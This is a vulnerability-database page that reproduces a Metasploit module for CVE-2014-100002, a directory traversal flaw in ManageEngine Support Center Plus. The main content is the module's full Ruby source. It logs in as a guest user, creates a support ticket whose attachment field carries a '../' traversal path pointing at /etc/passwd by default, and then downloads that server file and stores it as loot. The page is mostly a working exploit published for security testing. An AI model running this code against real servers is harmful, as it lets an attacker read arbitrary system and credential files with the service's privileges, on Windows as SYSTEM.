Vulners
Lucene search
ManageEngine Support Center Plus Directory Traversal
🗓️ 01 Sep 2024 00:00:00Reported by xistence, metasploit.comType 
packetstorm🔗 packetstormsecurity.com👁 221 Views
| Reporter | Title | Published | Views | Family All 7 |
|---|---|---|---|---|
 | CVE-2014-100002 | 29 May 201815:50 | – | circl |
 | CVE-2014-100002 | 13 Jan 201511:00 | – | cve |
 | CVE-2014-100002 | 13 Jan 201511:00 | – | cvelist |
 | ManageEngine SupportCenter Plus < 7.9 Build 7917 attach Parameter Directory Traversal | 3 Feb 201400:00 | – | nessus |
 | ManageEngine Support Center Plus Directory Traversal | 28 Jan 201408:45 | – | metasploit |
 | CVE-2014-100002 | 13 Jan 201511:59 | – | nvd |
 | Directory traversal | 13 Jan 201511:59 | – | prion |
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize(info={})
super(update_info(info,
'Name' => "ManageEngine Support Center Plus Directory Traversal",
'Description' => %q{
This module exploits a directory traversal vulnerability found in ManageEngine
Support Center Plus build 7916 and lower. The module will create a support ticket
as a normal user, attaching a link to a file on the server. By requesting our
own attachment, it's possible to retrieve any file on the filesystem with the same
privileges as Support Center Plus is running. On Windows this is always with SYSTEM
privileges.
},
'License' => MSF_LICENSE,
'Author' => 'xistence <xistence[at]0x90.nl>', # Discovery, Metasploit module
'References' =>
[
['CVE', '2014-100002'],
['EDB', '31262'],
['OSVDB', '102656'],
['BID', '65199'],
['PACKETSTORM', '124975']
],
'DisclosureDate' => '2014-01-28'
))
register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI', [true, 'The base path to the Support Center Plus installation', '/']),
OptString.new('USER', [true, 'The Support Center Plus user', 'guest']),
OptString.new('PASS', [true, 'The Support Center Plus password', 'guest']),
OptString.new('FILE', [true, 'The Support Center Plus password', '/etc/passwd'])
])
end
def run_host(ip)
uri = target_uri.path
peer = "#{ip}:#{rport}"
vprint_status("Retrieving cookie")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, "")
})
if res and res.code == 200
session = res.get_cookies
else
vprint_error("Server returned #{res.code.to_s}")
end
vprint_status("Logging in as user [ #{datastore['USER']} ]")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, "j_security_check"),
'cookie' => session,
'vars_post' =>
{
'j_username' => datastore['USER'],
'j_password' => datastore['PASS'],
'logonDomainName' => 'undefined',
'sso_status' => 'false',
'loginButton' => 'Login'
}
})
if res and res.code == 302
vprint_status("Login successful")
else
vprint_error("Login was not successful!")
return
end
randomname = Rex::Text.rand_text_alphanumeric(10)
vprint_status("Creating ticket with our requested file [ #{datastore['FILE']} ] as attachment")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, "WorkOrder.do"),
'cookie' => session,
'vars_post' =>
{
'reqTemplate' => '',
'prodId' => '0',
'priority' => '2',
'reqID' => '2',
'usertypename' => 'Requester',
'reqName' => 'Guest',
'category' => '0',
'item' => '0',
'subCategory' => '0',
'title' => randomname,
'description' => randomname,
'MOD_IND' => 'WorkOrder',
'FORMNAME' => 'WorkOrderForm',
'attach' => "/../../../../../../../../../../../..#{datastore['FILE']}",
'attPath' => '',
'component' => 'Request',
'attSize' => Rex::Text.rand_text_numeric(8),
'attachments' => randomname,
'autoCCList' => '',
'addWO' => 'addWO'
}
})
if res and res.code == 200
vprint_status("Ticket created")
if (res.body =~ /FileDownload.jsp\?module=Request\&ID=(\d+)\&authKey=(.*)\" class=/)
fileid = $1
vprint_status("File ID is [ #{fileid} ]")
fileauthkey = $2
vprint_status("Auth Key is [ #{fileauthkey} ]")
else
vprint_error("File ID and AuthKey not found!")
end
else
vprint_error("Ticket not created due to error!")
return
end
vprint_status("Requesting file [ #{uri}workorder/FileDownload.jsp?module=Request&ID=#{fileid}&authKey=#{fileauthkey} ]")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, "workorder", "FileDownload.jsp"),
'vars_get' =>
{
'module' => 'Request',
'ID' => fileid,
'authKey' => fileauthkey
}
})
# If we don't get a 200 when we request our malicious payload, we suspect
# we don't have a shell, either. Print the status code for debugging purposes.
if res and res.code == 200
data = res.body
p = store_loot(
'manageengine.supportcenterplus',
'application/octet-stream',
ip,
data,
datastore['FILE']
)
print_good("[ #{datastore['FILE']} ] loot stored as [ #{p} ]")
else
vprint_error("Server returned #{res.code.to_s}")
end
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Sep 2024 00:00Current
7.1High risk
Vulners AI Score7.1
CVSS 25
EPSS0.78866